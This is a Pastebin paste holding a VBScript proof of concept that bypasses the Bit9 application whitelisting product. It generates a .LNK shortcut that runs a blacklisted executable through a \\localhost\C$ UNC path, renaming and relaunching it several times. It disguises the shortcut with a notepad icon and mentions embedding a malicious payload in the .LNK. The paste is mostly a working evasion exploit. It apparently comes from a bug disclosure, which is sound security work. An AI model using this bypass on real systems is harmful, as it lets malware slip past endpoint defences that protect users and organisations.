Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ' Reported a bug in Bit9 whitelisting soln, where
- ' A blacklisted/malicious executable (c:\test\test.exe) can bypass Bit9 if run via its UNC path "\\localhost\C$\any.exe" or any other
- ' UNC equivalent path.
- ' Attack vector could be .LNK or .PS1 file. I prefer .Lnk since it is rarely blacklisted.
- ' The VBS script below generates a POC .LNK file that exploits that.
- ' We can also embed the malicious payload inside the .LNK file itself to have a standalone .LNK file.
- ' https://twitter.com/waleedassar
- set WshShell = WScript.CreateObject("WScript.Shell")
- set oShellLink = WshShell.CreateShortcut("B.Lnk")
- oShellLink.TargetPath = "Cmd.exe"
- oShellLink.Arguments = "/C start \\localhost\C$\test\test.exe & rename \\localhost\C$\test\test.exe test_1.exe & start \\localhost\C$\test\test_1.exe & rename \\localhost\C$\test\test_1.exe test_2.exe & start \\localhost\C$\test\test_2.exe & rename \\localhost\C$\test\test_2.exe test_3.exe & start \\localhost\C$\test\test_3.exe & rename \\localhost\C$\test\test_3.exe test_4.exe & start \\localhost\C$\test\test_4.exe & rename \\localhost\C$\test\test_4.exe test_5.exe"
- oShellLink.WindowStyle = 1
- oShellLink.IconLocation = "notepad.exe, 0"
- oShellLink.Description = "Bit9 Bypass"
- oShellLink.Save
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
